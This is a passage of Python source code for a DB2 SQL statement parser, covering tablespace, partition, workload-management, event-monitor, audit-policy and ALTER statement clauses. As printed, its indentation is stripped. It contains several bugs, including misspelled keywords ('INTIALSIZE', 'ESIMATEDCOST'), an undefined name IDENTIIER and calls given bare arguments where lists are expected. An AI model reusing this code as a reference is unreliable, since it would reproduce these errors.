self._expect_one_of(['GRANT', 'ADMIN'])
self._expect('OPTION')
else:
self._match_sequence(['BY', 'ALL'])
self._match('RESTRICT')
def _parse_tablespace_size_attributes(self):
"""Parses DMS size attributes in a CREATE TABLESPACE statement"""
if self._match('AUTORESIZE'):
self._expect_one_of(['NO', 'YES'])
if self._match('INTIALSIZE'):
self._expect(TT.NUMBER)
self._expect_one_of(['K', 'M', 'G'])
if self._match('INCREASESIZE'):
self._expect(TT.NUMBER)
self._expect_one_of(['K', 'M', 'G', 'PERCENT'])
if self._match('MAXSIZE'):
if not self._match('NONE'):
self._expect(TT.NUMBER)
self._expect_one_of(['K', 'M', 'G'])
def _parse_database_container_clause(self, size=True):
"""Parses a container clause for a DMS tablespace"""
self._expect('(')
while True:
self._expect_one_of(['FILE', 'DEVICE'])
self._expect(TT.STRING)
if size:
self._expect(TT.NUMBER)
self._match_one_of(['K', 'M', 'G'])
if not self._match(','):
break
self._expect(')')
def _parse_system_container_clause(self):
"""Parses a container clause for an SMS tablespace"""
self._expect('(')
while True:
self._expect(TT.STRING)
if not self._match(','):
break
self._expect(')')
def _parse_db_partition_clause(self):
"""Parses a DBPARTITIONNUM clause in various statements"""
if not self._match('GLOBAL'):
if self._match('AT'):
self._expect_one_of(['DBPARTITIONNUM', 'NODE'])
self._expect(TT.NUMBER)
def _parse_db_partition_list_clause(self, size=False):
"""Parses an DBPARTITIONNUM clause in various statements"""
self._expect_one_of([
'DBPARTITIONNUM',
'DBPARTITIONNUMS',
'NODE', # compatibility option
'NODES', # compatibility option
])
self._expect('(')
while True:
self._expect(TT.NUMBER)
self._match_sequence(['TO', TT.NUMBER])
if size:
self._expect_sequence(['SIZE', TT.NUMBER])
if not self._match(','):
break
self._expect(')')
def _parse_db_partitions_clause(self):
"""Parses a DBPARTITIONNUM list clause in various statements"""
if self._match('ON'):
if self._match('ALL'):
self._expect_one_of(['DBPARTITIONNUMS', 'NODES'])
if self._match('EXCEPT'):
self._parse_db_partition_list_clause(size=False)
else:
self._parse_db_partition_list_clause(size=False)
def _parse_function_predicates_clause(self):
"""Parses the PREDICATES clause in a CREATE FUNCTION statement"""
# PREDICATES already matched
# The surrounding parentheses seem to be optional (although the syntax
# diagram in the DB2 Info Center implies otherwise)
parens = self._match('(')
self._expect('WHEN')
self._match_one_of(['=', '<>', '<', '>', '<=', '>='])
if self._match('EXPRESSION'):
self._expect_sequence(['AS', TT.IDENTIFIER])
else:
self._parse_expression()
valid = ['SEARCH', 'FILTER']
while valid:
t = self._match_one_of(valid)
if t:
t = t.value
valid.remove(t)
else:
break
if t == 'SEARCH':
self._expect('BY')
self._match('EXACT')
self._expect('INDEX')
self._expect('EXTENSION')
self._parse_index_name()
self._expect('WHEN')
while True:
self._expect_sequence(['KEY', '(', TT.IDENTIFIER, ')', 'USE', TT.IDENTIFIER, '('])
self._parse_ident_list()
self._expect(')')
if not self._match('WHEN'):
break
elif t == 'FILTER':
self._expect('USING')
if self._match('CASE'):
if self._match('WHEN'):
self._parse_searched_case()
else:
self._parse_simple_case()
else:
self._parse_scalar_function_call()
if parens:
self._expect(')')
def _parse_federated_options(self, alter=False):
"""Parses an OPTIONS list for a federated object"""
# OPTIONS already matched
self._expect('(')
while True:
if alter and self._match('DROP'):
self._expect(TT.IDENTIFIER)
else:
if alter:
self._match_one_of('ADD', 'SET')
else:
self._match('ADD')
self._expect(TT.IDENTIFIER)
self._expect(TT.STRING)
if not self._match(','):
break
self._expect(')')
def _parse_remote_server(self):
"""Parses a remote server specification"""
# SERVER already matched
if self._match('TYPE'):
self._expect(TT.IDENTIFIER)
if self._match('VERSION'):
self._parse_server_version()
if self._match('WRAPPER'):
self._expect(TT.IDENTIFIER)
else:
self._expect(TT.IDENTIFIER)
if self._match('VERSION'):
self._parse_server_version()
def _parse_server_version(self):
"""Parses a federated server version"""
# VERSION already matched
if self._match(TT.NUMBER):
if self._match('.'):
self._expect(TT.NUMBER)
if self._match('.'):
self._expect(TT.NUMBER)
elif self._match(TT.STRING):
pass
else:
self._expected_one_of([TT.NUMBER, TT.STRING])
def _parse_partition_boundary(self):
"""Parses a partition boundary in a PARTITION clause"""
if self._match('STARTING'):
self._match('FROM')
if self._match('('):
while True:
self._expect_one_of([TT.NUMBER, 'MINVALUE', 'MAXVALUE'])
if not self._match(','):
break
self._expect(')')
else:
self._expect_one_of([TT.NUMBER, 'MINVALUE', 'MAXVALUE'])
self._match_one_of(['INCLUSIVE', 'EXCLUSIVE'])
self._expect('ENDING')
self._match('AT')
if self._match('('):
while True:
self._expect_one_of([TT.NUMBER, 'MINVALUE', 'MAXVALUE'])
if not self._match(','):
break
self._expect(')')
else:
self._expect_one_of([TT.NUMBER, 'MINVALUE', 'MAXVALUE'])
self._match_one_of(['INCLUSIVE', 'EXCLUSIVE'])
def _parse_copy_options(self):
"""Parse copy options for CREATE TABLE... LIKE statements"""
# XXX Tidy this up (shouldn't just be a 2-time loop)
for i in xrange(2):
if self._match_one_of(['INCLUDING', 'EXCLUDING']):
if self._match('COLUMN'):
self._expect('DEFAULTS')
elif self._match('DEFAULTS'):
pass
elif self._match('IDENTITY'):
self._match_sequence(['COLUMN', 'ATTRIBUTES'])
def _parse_refreshable_table_options(self, alter=False):
"""Parses refreshable table options in a materialized query definition"""
if not alter and self._match('WITH'):
self._expect_sequence(['NO', 'DATA'])
self._parse_copy_options()
else:
valid = [
'DATA',
'REFRESH',
'ENABLE',
'DISABLE',
'MAINTAINED',
]
while valid:
t = self._match_one_of(valid)
if t:
t = t.value
valid.remove(t)
else:
break
if t == 'DATA':
self._expect_sequence(['INITIALLY', 'DEFERRED'])
elif t == 'REFRESH':
self._expect_one_of(['DEFERRED', 'IMMEDIATE'])
elif t in ('ENABLE', 'DISABLE'):
self._expect_sequence(['QUERY', 'OPTIMIZATION'])
if t == 'ENABLE':
valid.remove('DISABLE')
else:
valid.remove('ENABLE')
elif t == 'MAINTAINED':
self._expect('BY')
self._expect_one_of(['SYSTEM', 'USER', 'FEDERATED_TOOL'])
def _parse_action_types_clause(self):
"""Parses an action types clause in a WORK ACTION"""
if self._match('MAP'):
self._expect('ACTIVITY')
if self._match_one_of(['WITH', 'WITHOUT']):
self._expect('NESTED')
self._expect('TO')
self._expect(TT.IDENTIFIER)
elif self._match('WHEN'):
self._parse_threshold_predicate()
self._parse_threshold_exceeded_actions()
elif self._match('PREVENT'):
self._expect('EXECUTION')
elif self._match('COUNT'):
self._expect('ACTIVITY')
elif self._match('COLLECT'):
if self._match('ACTIVITY'):
self._expect('DATA')
self._parse_collect_activity_data_clause()
elif self._match('AGGREGATE'):
self._expect_sequence(['ACTIVITY', 'DATA'])
self._match_one_of(['BASE', 'EXTENDED'])
else:
self._expected_one_of(['MAP', 'WHEN', 'PREVENT', 'COUNT', 'COLLECT'])
def _parse_threshold_predicate(self):
"""Parses a threshold predicate in a WORK ACTION"""
if self._match_one_of([
'TOTALDBPARTITIONCONNECTIONS',
'CONCURRENTWORKLOADOCCURRENCES',
'CONCURRENTWORKLOADACTIVITIES',
'ESTIMATEDSQLCOST',
'SQLROWSRETURNED',
]):
self._expect_sequence(['>', TT.NUMBER])
elif self._match('TOTALSCPARTITIONCONNECTIONS'):
self._expect_sequence(['>', TT.NUMBER])
if self._match('QUEUEDCONNECTIONS'):
if self._match('>'):
self._expect(TT.NUMBER)
elif self._match('UNBOUNDED'):
pass
else:
self._expected_one_of(['>', 'UNBOUNDED'])
elif self._match('CONCURRENTDBCOORDACTIVITIES'):
self._expect_sequence(['>', TT.NUMBER])
if self._match('QUEUEDACTIVITIES'):
if self._match('>'):
self._expect(TT.NUMBER)
elif self._match('UNBOUNDED'):
pass
else:
self._expected_one_of(['>', 'UNBOUNDED'])
elif self._match_one_of([
'CONNECTIONIDLETIME',
'ACTIVITYTOTALTIME',
]):
self._expect_sequence(['>', TT.NUMBER])
self._expect_one_of([
'DAY',
'DAYS',
'HOUR',
'HOURS',
'MINUTE',
'MINUTES'
])
elif self._match('SQLTEMPSPACE'):
self._expect_sequence(['>', TT.NUMBER])
self._expect_one_of(['K', 'M', 'G'])
def _parse_threshold_exceeded_actions(self):
"""Parses a threshold exceeded actions clause in a WORK ACTION"""
if self._match_sequence(['COLLECT', 'ACTIVITY', 'DATA']):
self._parse_collect_activity_data_clause(alter=True)
if self._match('STOP'):
self._expect('EXECUTION')
elif not self._match('CONTINUE'):
self._expected_one_of(['STOP', 'CONTINUE'])
def _parse_collect_activity_data_clause(self, alter=False):
"""Parses a COLLECT ACTIVITY clause in an action clause"""
# COLLECT ACTIVITY DATA already matched
if not (alter and self._match('NONE')):
self._expect('ON')
if self._match('ALL'):
self._match_sequence(['DATABASE', 'PARTITIONS'])
elif self._match('COORDINATOR'):
self._match_sequence(['DATABASE', 'PARTITION'])
else:
self._expected_one_of(['ALL', 'COORDINATOR'])
if self._match('WITHOUT'):
self._expect('DETAILS')
elif self._match('WITH'):
self._expect('DETAILS')
if self._match('AND'):
self._expect('VALUES')
else:
self._expected_one_of(['WITHOUT', 'WITH'])
def _parse_histogram_template_clause(self):
"""Parses a history template clause in a WORK ACTION"""
if self._match('ACTIVITY'):
self._expect_one_of(['LIFETIME', 'QUEUETIME', 'EXECUTETIME', 'ESIMATEDCOST', 'INTERARRIVALTIME'])
self._expect_sequence(['HISTOGRAM', 'TEMPLATE'])
self._expect_one_of(['SYSDEFAULTHISTOGRAM', TT.IDENTIFIER])
def _parse_work_attributes(self):
"""Parses a work attributes clause in a WORK CLASS"""
self._expect_sequence(['WORK', 'TYPE'])
if self._match_one_of(['READ', 'WRITE', 'DML']):
self._parse_for_from_to_clause()
elif self._match('ALL'):
if self._match('FOR'):
self._parse_for_from_to_clause()
if self._match('ROUTINES'):
self._parse_routines_in_schema_clause()
elif self._match('CALL'):
if self._match('ROUTINES'):
self._parse_routines_in_schema_clause()
elif not self._match_one_of(['DDL', 'LOAD']):
self._expected_one_of(['READ', 'WRITE', 'DML', 'DDL', 'LOAD', 'ALL', 'CALL'])
def _parse_for_from_to_clause(self, alter=False):
"""Parses a FOR .. FROM .. TO clause in a WORK CLASS definition"""
# FOR already matched
if alter and self._match('ALL'):
self._expect_sequence(['UNITS', 'UNBOUNDED'])
else:
self._expect_one_of(['TIMERONCOST', 'CARDINALITY'])
self._expect_sequence(['FROM', TT.NUMBER])
if self._match('TO'):
self._expect_one_of(['UNBOUNDED', TT.NUMBER])
def _parse_routines_in_schema_clause(self, alter=False):
"""Parses a schema clause in a WORK CLASS definition"""
# ROUTINES already matched
if alter and self._match('ALL'):
pass
else:
self._expect_sequence(['IN', 'SCHEMA', TT.IDENTIFIER])
def _parse_position_clause(self):
"""Parses a POSITION clause in a WORK CLASS definition"""
# POSITION already matched
if self._match('AT'):
self._expect(TT.NUMBER)
elif self._match_one_of(['BEFORE', 'AFTER']):
self._expect(TT.IDENTIFIER)
elif self._match('LAST'):
pass
else:
self._expected_one_of(['AT', 'BEFORE', 'AFTER', 'LAST'])
def _parse_connection_attributes(self):
"""Parses connection attributes in a WORKLOAD"""
if self._match_one_of([(TT.REGISTER, 'APPLNAME'), (TT.REGISTER, 'SYSTEM_USER')]):
pass
elif self._match((TT.REGISTER, 'SESSION_USER')):
self._match('GROUP')
elif self._match('CURRENT'):
self._expect_one_of([
(TT.REGISTER, 'CLIENT_USERID'),
(TT.REGISTER, 'CLIENT_APPLNAME'),
(TT.REGISTER, 'CLIENT_WRKSTNNAME'),
(TT.REGISTER, 'CLIENT_ACCTNG')
])
else:
self._expected_one_of(['APPLNAME', 'SYSTEM_USER', 'SESSION_USER', 'CURRENT'])
self._expect('(')
while True:
if not self._match(TT.STRING):
self._expect(')')
break
def _parse_audit_policy(self, alter=False):
"""Parses an AUDIT POLICY definition"""
valid = set(['CATEGORIES', 'ERROR'])
while valid:
t = self._match_one_of(valid)
if t:
t = t.value
valid.remove(t)
else:
break
if t == 'CATEGORIES':
while True:
if self._expect_one_of([
'ALL',
'AUDIT',
'CHECKING',
'CONTEXT',
'EXECUTE',
'OBJMAINT',
'SECMAINT',
'SYSADMIN',
'VALIDATE'
]).value == 'EXECUTE':
if self._match_one_of(['WITH', 'WITHOUT']):
self._expect('DATA')
self._expect('STATUS')
self._expect_one_of(['BOTH', 'FAILURE', 'NONE', 'SUCCESS'])
if not self._match(','):
break
elif t == 'ERROR':
self._expect('TYPE')
self._expect_one_of(['NORMAL', 'AUDIT'])
# If we're defining a new policy, ensure both terms are specified
if not alter and valid:
self._expected(valid.pop())
def _parse_evm_group(self):
"""Parses an event monitor group in a non-wlm event monitor definition"""
while True:
self._expect(TT.IDENTIFIER)
if self._match('('):
valid = set(['TABLE', 'IN', 'PCTDEACTIVATE', 'TRUNC', 'INCLUDES', 'EXCLUDES'])
while valid:
t = self._match_one_of(valid)
if t:
t = t.value
valid.remove(t)
else:
break
if t == 'TABLE':
self._parse_table_name()
elif t == 'IN':
self._expect(TT.IDENTIFIER)
elif t == 'PCTDEACTIVATE':
self._expect(TT.NUMBER)
elif t == 'TRUNC':
pass
elif t == 'INCLUDES' or t == 'EXCLUDES':
self._expect('(')
while True:
self._expect(TT.IDENTIFIER)
if not self._match(','):
break
self._expect(')')
self._expect(')')
if not self._match(','):
break
def _parse_evm_write_to(self):
"""Parses a WRITE TO clause in an event monitor definition"""
# WRITE TO already matched
if self._match('TABLE'):
valid = set(['BUFFERSIZE', 'BLOCKED', 'NONBLOCKED', 'evm-group'])
while valid:
t = self._match_one_of(valid)
if t:
t = t.value
valid.remove(t)
elif 'evm-group' in valid:
self._save_state()
try:
self._parse_evm_group()
valid.remove('evm-group')
except ParseError:
self._restore_state()
break
else:
self._forget_state()
else:
break
if t == 'BUFFERSIZE':
self._expect(TT.NUMBER)
elif t == 'BLOCKED':
valid.remove('NONBLOCKED')
elif t == 'NONBLOCKED':
valid.remove('BLOCKED')
elif self._match('PIPE'):
self._expect(TT.STRING)
elif self._match('FILE'):
self._expect(TT.STRING)
valid = set(['MAXFILES', 'MAXFILESIZE', 'BUFFERSIZE', 'BLOCKED', 'NONBLOCKED', 'APPEND', 'REPLACE'])
while valid:
t = self._match_one_of(valid)
if t:
t = t.value
valid.remove(t)
else:
break
if t == 'MAXFILES' or t == 'MAXFILESIZE':
self._expect_one_of(['NONE', TT.NUMBER])
elif t == 'BLOCKED':
valid.remove('NONBLOCKED')
elif t == 'NONBLOCKED':
valid.remove('BLOCKED')
elif t== 'APPEND':
valid.remove('REPLACE')
elif t == 'REPLACE':
valid.remove('APPEND')
else:
self._expected_one_of(['TABLE', 'PIPE', 'FILE'])
def _parse_evm_options(self):
"""Parses the options after an event monitor definition"""
valid = set(['WRITE', 'AUTOSTART', 'MANUALSTART', 'ON', 'LOCAL', 'GLOBAL'])
while valid:
t = self._match_one_of(valid)
if t:
t = t.value
valid.remove(t)
else:
break
if t == 'WRITE':
self._expect('TO')
self._parse_evm_write_to()
elif t == 'AUTOSTART':
valid.remove('MANUALSTART')
elif t == 'MANUALSTART':
valid.remove('AUTOSTART')
elif t == 'ON':
self._expect_one_of(['NODE', 'DBPARTITIONNUM'])
self._expect(TT.NUMBER)
elif t == 'LOCAL':
valid.remove('GLOBAL')
elif t == 'GLOBAL':
valid.remove('LOCAL')
def _parse_nonwlm_event_monitor(self):
"""Parses a non-wlm event monitor definition"""
while True:
if self._match_one_of(['DATABASE', 'TABLES', 'BUFFERPOOLS', 'TABLESPACES']):
pass
elif self._match('DEADLOCKS'):
if self._match_sequence(['WITH', 'DETAILS']):
if self._match('HISTORY'):
self._match('VALUES')
elif self._match_one_of(['CONNECTIONS', 'STATEMENTS', 'TRANSACTIONS']):
if self._match('WHERE'):
self._parse_search_condition()
else:
self._expected_one_of([
'DATABASE',
'TABLES',
'BUFFERPOOLS',
'TABLESPACES',
'DEADLOCKS',
'CONNECTIONS',
'STATEMENTS',
'TRANSACTIONS',
])
if not self._match(','):
break
self._parse_evm_options()
def _parse_wlm_event_monitor(self):
"""Parses a wlm event monitor definition"""
if self._expect_one_of(['ACTIVITIES', 'STATISTICS', 'THRESHOLD']).value == 'THRESHOLD':
self._expect('VIOLATIONS')
self._parse_evm_options()
# STATEMENTS #############################################################
def _parse_allocate_cursor_statement(self):
"""Parses an ALLOCATE CURSOR statement in a procedure"""
# ALLOCATE already matched
self._expect_sequence([TT.IDENTIFIER, 'CURSOR', 'FOR', 'RESULT', 'SET', TT.IDENTIFIER])
def _parse_alter_audit_policy_statement(self):
"""Parses an ALTER AUDIT POLICY statement"""
# ALTER AUDIT POLICY already matched
self._expect(IDENTIIER)
self._parse_audit_policy(alter=True)
def _parse_alter_bufferpool_statement(self):
"""Parses an ALTER BUFFERPOOL statement"""
# ALTER BUFFERPOOL already matched
self._expect(TT.IDENTIFIER)
if self._match('ADD'):
if self._expect_one_of(['NODEGROUP', 'DATABASE']).value == 'DATABASE':
self._expect_sequence(['PARTITION', 'GROUP'])
self._expect(TT.IDENTIFIER)
elif self._match('NUMBLOCKPAGES'):
self._expect(TT.NUMBER)
if self._match('BLOCKSIZE'):
self._expect(TT.NUMBER)
elif self._match('BLOCKSIZE'):
self._expect(TT.NUMBER)
elif self._match('NOT'):
self._expect_sequence(['EXTENDED', 'STORAGE'])
elif self._match('EXTENDED'):
self._expect('STORAGE')
else:
self._match_one_of(['IMMEDIATE', 'DEFERRED'])
if self._match_one_of(['DBPARTITIONNUM', 'NODE']):
self._expect(TT.NUMBER)
self._expect('SIZE')
if self._match(TT.NUMBER):
self._match('AUTOMATIC')
else:
self._expect_one_of([TT.NUMBER, 'AUTOMATIC'])
def _parse_alter_database_statement(self):
"""Parses an ALTER DATABASE statement"""
# ALTER DATABASE already matched
if not self._match('ADD'):
self._expect(TT.IDENTIFIER)
self._expect('ADD')
self._expect_sequence(['STORAGE', 'ON'])
while True:
self._expect(TT.STRING)
if not self._match(','):
break
def _parse_alter_function_statement(self, specific):
"""Parses an ALTER FUNCTION statement"""
# ALTER [SPECIFIC] FUNCTION already matched
self._parse_function_name()
if not specific and self._match('(', prespace=False):
if not self._match(')'):
self._parse_datatype_list()
self._expect(')')
first = True
while True:
if self._match('EXTERNAL'):
self._expect('NAME')
self._expect_one_of([TT.STRING, TT.IDENTIFIER])
elif self._match('NOT'):
self._expect_one_of(['FENCED', 'THREADSAFE'])
elif self._match_one_of(['FENCED', 'THREADSAFE']):
pass
elif first:
self._expected_one_of([
'EXTERNAL',
'NOT',
'FENCED',
'THREADSAFE',
])
else:
break
first = False
def _parse_alter_partition_group_statement(self):
"""Parses an ALTER DATABASE PARTITION GROUP statement"""
# ALTER [DATABASE PARTITION GROUP|NODEGROUP] already matched
self._expect(TT.IDENTIFIER)
while True:
if self._match('ADD'):
self._parse_db_partition_list_clause(size=False)
if self._match('LIKE'):
self._expect_one_of(['DBPARTITIONNUM', 'NODE'])
self._expect(TT.NUMBER)
elif self._match('WITHOUT'):
self._expect('TABLESPACES')
elif self._match('DROP'):
self._parse_db_partition_list_clause(size=False)
else:
self._expected_one_of(['ADD', 'DROP'])
if not self._match(','):
break
def _parse_alter_histogram_template_statement(self):
"""Parses an ALTER HISTOGRAM TEMPLATE statement"""
# ALTER HISTOGRAM TEMPLATE already matched
self._expect_sequence([TT.IDENTIFIER, 'HIGH', 'BIN', 'VALUE', TT.NUMBER])
def _parse_alter_module_statement(self):
"""Parses an ALTER MODULE statement"""
# ALTER MODULE already matched
self._parse_module_name()
if self._match_one_of(['ADD', 'PUBLISH']):
self._match_sequence(['OR', 'REPLACE'])
if self._match('CONDITION'):
self._expect(TT.IDENTIFIER)
if self._match('FOR'):
if self._match('SQLSTATE'):
self._match('VALUE')
self._expect(TT.STRING)
elif self._match('FUNCTION'):
self._parse_create_function_statement()
elif self._match('PROCEDURE'):
self._parse_create_procedure_statement()
elif self._match('TYPE'):
self._parse_create_type_statement()
elif self._match('VARIABLE'):
self._parse_create_variable_statement()
elif self._match('DROP'):
if not self._match('BODY'):
if self._match('CONDITION'):
self._expect(TT.IDENTIFIER)
elif self._match_one_of(['FUNCTION', 'PROCEDURE']):
self._parse_routine_name()
if self._match('(', prespace=False):
self._parse_datatype_list()
self._expect(')')
elif self._match('SPECIFIC'):
self._expect_one_of(['FUNCTION', 'PROCEDURE'])
self._parse_routine_name()
elif self._match('TYPE'):
self._parse_type_name()
elif self._match('VARIABLE'):
self._parse_variable_name()
else:
self._expected_one_of([
'BODY',
'CONDITION',
'FUNCTION',
'PROCEDURE',
'SPECIFIC',
'TYPE',
'VARIABLE',
])
else:
self._expected_one_of(['ADD', 'DROP', 'PUBLISH'])
def _parse_alter_nickname_statement(self):
"""Parses an ALTER NICKNAME statement"""
# ALTER NICKNAME already matched
self._parse_nickname_name()
if self._match('OPTIONS'):
self._parse_federated_options(alter=True)
while True:
if self._match('ADD'):
self._parse_table_constraint()
elif self._match('ALTER'):
if self._match('FOREIGN'):
self._expect('KEY')
self._parse_constraint_alteration()
elif self._match('CHECK'):
self._parse_constraint_alteration()
else:
# Ambiguity: A column can be called COLUMN
self._save_state()
try:
self._match('COLUMN')
self._parse_federated_column_alteration()
except ParseError:
self._restore_state()
self._parse_federated_column_alteration()
else:
self._forget_state()
elif self._match('DROP'):
if self._match('PRIMARY'):
self._expect('KEY')
elif self._match('FOREIGN'):
self._expect_sequence(['KEY', TT.IDENTIFIER])
elif self._match_one_of(['UNIQUE', 'CHECK', 'CONSTRAINT']):
self._expect(TT.IDENTIFIER)
else:
self._expected_one_of(['PRIMARY', 'FOREIGN', 'CHECK', 'CONSTRAINT'])
elif self._match_one_of(['ALLOW', 'DISALLOW']):
self._expect('CACHING')
else:
break
self._newline()
def _parse_alter_procedure_statement(self, specific):
"""Parses an ALTER PROCEDURE statement"""
# ALTER [SPECIFIC] PROCEDURE already matched
self._parse_procedure_name()
if not specific and self._match('(', prespace=False):
if not self._match(')'):
self._parse_datatype_list()
self._expect(')')
first = True
while True:
if self._match('EXTERNAL'):
if self._match('NAME'):
self._expect([TT.STRING, TT.IDENTIFIER])
elif self._match('ACTION'):
pass
else:
self._expected_one_of(['NAME', 'ACTION'])
elif self._match('NOT'):
self._expect_one_of(['FENCED', 'THREADSAFE'])
elif self._match_one_of(['FENCED', 'THREADSAFE']):
pass
elif self._match('NO'):
self._expect_sequence(['EXTERNAL', 'ACTION'])
elif self._match('NEW'):
self._expect_sequence(['SAVEPOINT', 'LEVEL'])
elif self._match('ALTER'):
self._expect_sequence(['PARAMETER', TT.IDENTIFIER, 'SET', 'DATA', 'TYPE'])
self._parse_datatype()
elif first:
self._expected_one_of([
'EXTERNAL',
'NOT',
'FENCED',
'NO',
'EXTERNAL',
'THREADSAFE',
'ALTER',
])
else:
break
first = False
def _parse_alter_security_label_component_statement(self):
"""Parses an ALTER SECURITY LABEL COMPONENT statement"""
# ALTER SECURITY LABEL COMPONENT already matched
self._expect_sequence(TT.IDENTIFIER, 'ADD', 'ELEMENT', TT.STRING)
if self._match_one_of(['BEFORE', 'AFTER']):
self._expect(TT.STRING)
elif self._match('ROOT'):
pass
elif self._match('UNDER'):
self._expect(TT.STRING)
if self._match('OVER'):
while True:
self._expect(TT.STRING)
if not self._match(','):
break
self._expect('OVER')
def _parse_alter_security_policy_statement(self):
"""Parses an ALTER SECURITY POLICY statement"""
# ALTER SECURITY POLICY
self._expect(TT.IDENTIFIER)
while True:
if self._match('ADD'):
self._expect_sequence(['SECURITY', 'LABEL', 'COMPONENT', TT.IDENTIFIER])
elif self._match_one_of(['OVERRIDE', 'RESTRICT']):
self._expect_sequence(['NOT', 'AUTHORIZED', 'WRITE', 'SECURITY', 'LABEL'])
elif self._match_one_of(['USE', 'IGNORE']):
self._expect_one_of(['GROUP', 'ROLE'])
self._expect('AUTHORIZATIONS')
else:
break
def _parse_alter_sequence_statement(self):
"""Parses an ALTER SEQUENCE statement"""
# ALTER SEQUENCE already matched
self._parse_sequence_name()
self._parse_identity_options(alter='SEQUENCE')
def _parse_alter_server_statement(self):
"""Parses an ALTER SERVER statement"""
# ALTER SERVER already matched
self._parse_remote_server()
if self._match('OPTIONS'):
self._parse_federated_options(alter=True)
def _parse_alter_service_class_statement(self):
"""Parses an ALTER SERVICE CLASS statement"""
# ALTER SERVICE CLASS already matched
self._expect(TT.IDENTIFIER)
if self._match('UNDER'):
self._expect(TT.IDENTIFIER)
first = True
while True:
if self._match('AGENT'):
self._expect('PRIORITY')
self._expect_one_of(['DEFAULT', TT.NUMBER])
elif self._match('PREFETCH'):
self._expect('PRIORITY')
self._expect_one_of(['LOW', 'MEDIUM', 'HIGH', 'DEFAULT'])
elif self._match('OUTBOUND'):
self._expect('CORRELATOR')
self._expect_one_of(['NONE', TT.STRING])
elif self._match('COLLECT'):
if self._match('ACTIVITY'):
self._expect('DATA')
if self._match('ON'):
if self._match('ALL'):
self._match_sequence(['DATABASE', 'PARTITIONS'])
elif self._match('COORDINATOR'):
self._match_sequence(['DATABASE', 'PARTITION'])
else:
self._expected_one_of(['ALL', 'COORDINATOR'])
self._expect_one_of(['WITH', 'WITHOUT'])
self._expect('DETAILS')
self._match_sequence(['AND', 'VALUES'])
elif self._match('NONE'):
pass
else:
self._expected_one_of(['ON', 'NONE'])
elif self._match('AGGREGATE'):
if self._match('ACTIVITY'):
self._expect('DATA')
self._match_one_of(['BASE', 'EXTENDED', 'NONE'])
elif self._match('REQUEST'):
self._expect('DATA')
self._match_one_of(['BASE', 'NONE'])
else:
self._expected_one_of(['ACTIVITY', 'REQUEST'])
else:
self._expected_one_of(['ACTIVITY', 'AGGREGATE'])
elif self._match('ACTIVITY'):
self._expect_one_of(['LIFETIME', 'QUEUETIME', 'EXECUTETIME', 'ESTIMATEDCOST', 'INTERARRIVALTIME'])
self._expect_sequence(['HISTOGRAM', 'TEMPLATE', TT.IDENTIFIER])
elif self._match('REQUEST'):
self._expect_sequence(['EXECUTETIME', 'HISTOGRAM', 'TEMPLATE', TT.IDENTIFIER])
elif self._match_one_of(['ENABLE', 'DISABLE']):
pass
elif not first:
break
else:
self._expected_one_of([
'AGENT',
'PREFETCH',
'OUTBOUND',
'COLLECT',
'ACTIVITY',
'REQUEST',
'ENABLE',
'DISABLE'
])
def _parse_alter_table_statement(self):
"""Parses an ALTER TABLE statement"""
# ALTER TABLE already matched
self._parse_table_name()
self._indent()
while True:
if self._match('ADD'):
if self._match('RESTRICT'):
self._expect_sequence(['ON', 'DROP'])
elif self._match('PARTITION'):
# Ambiguity: optional partition name
self._save_state()
try:
self._match(TT.IDENTIFIER)
self._parse_partition_boundary()
except ParseError:
self._restore_state()
self._parse_partition_boundary()
else:
self._forget_state()
if self._match('IN'):
self._expect(TT.IDENTIFIER)
if self._match('LONG'):
self._expect('IN')
self._expect(TT.IDENTIFIER)
elif self._match('MATERIALIZED'):
self._expect('QUERY')
self._expect('(')
self._indent()
self._parse_full_select()
self._outdent()
self._expect(')')
self._parse_refreshable_table_options(alter=True)
elif self._match('QUERY'):
self._expect('(')
self._indent()
self._parse_full_select()
self._outdent()
self._expect(')')
self._parse_refreshable_table_options(alter=True)
elif self._match('('):
self._indent()
self._parse_full_select()
self._outdent()
self._expect(')')
self._parse_refreshable_table_options(alter=True)
elif self._match('COLUMN'):
self._parse_column_definition()
elif self._match('SECURITY'):
self._expect('POLICY')
self._expect(TT.IDENTIFIER)
else:
self._save_state()
try:
# Try parsing a table constraint definition
self._parse_table_constraint()
except ParseError:
# If that fails, rewind and try and parse a column definition
self._restore_state()
self._parse_column_definition()
else:
self._forget_state()
elif self._match('ATTACH'):
self._expect('PARTITION')
# Ambiguity: optional partition name
self._save_state()
try:
self._match(TT.IDENTIFIER)
self._parse_partition_boundary()
except ParseError:
self._restore_state()
self._parse_partition_boundary()
else:
self._forget_state()
self._expect('FROM')
self._parse_table_name()
elif self._match('DETACH'):
self._expect_sequence(['PARTITION', TT.IDENTIFIER, 'FROM'])
self._parse_table_name()
elif self._match('ALTER'):
if self._match('FOREIGN'):
self._expect('KEY')
self._parse_constraint_alteration()
elif self._match('CHECK'):
self._parse_constraint_alteration()
else:
# Ambiguity: A column can be called COLUMN
self._save_state()
try:
self._match('COLUMN')
self._parse_column_alteration()
except ParseError:
self._restore_state()
self._parse_column_alteration()
else:
self._forget_state()
elif self._match('RENAME'):
self._match('COLUMN')
self._expect_sequence([TT.IDENTIFIER, 'TO', TT.IDENTIFIER])
elif self._match('DROP'):
if self._match('PRIMARY'):
self._expect('KEY')
elif self._match('FOREIGN'):
self._expect_sequence(['KEY', TT.IDENTIFIER])
elif self._match_one_of(['UNIQUE', 'CHECK', 'CONSTRAINT']):
self._expect(TT.IDENTIFIER)
elif self._match('COLUMN'):
self._expect(TT.IDENTIFIER)
self._match_one_of(['CASCADE', 'RESTRICT'])
elif self._match('RESTRICT'):
self._expect_sequence(['ON', 'DROP'])
elif self._match('DISTRIBUTION'):
pass
elif self._match('MATERIALIZED'):
self._expect('QUERY')
elif self._match('QUERY'):
pass
elif self._match('SECURITY'):
self._expect('POLICY')
else:
self._expect(TT.IDENTIFIER)
self._match_one_of(['CASCADE', 'RESTRICT'])
elif self._match('DATA'):
self._expect('CAPTURE')
if self._match('CHANGES'):
self._match_sequence(['INCLUDE', 'LONGVAR', 'COLUMNS'])
elif self._match('NONE'):
pass
else:
self._expected_one_of(['NONE', 'CHANGES'])
elif self._match('PCTFREE'):
self._expect(TT.NUMBER)
elif self._match('LOCKSIZE'):
self._expect_one_of(['ROW', 'BLOCKINSERT', 'TABLE'])
elif self._match('APPEND'):
self._expect_one_of(['ON', 'OFF'])
elif self._match('VOLATILE'):
self._match('CARDINALITY')
elif self._match('NOT'):
self._expect('VOLATILE')
self._match('CARDINALITY')
elif self._match('COMPRESS'):
self._expect_one_of(['YES', 'NO'])
elif self._match('ACTIVATE'):
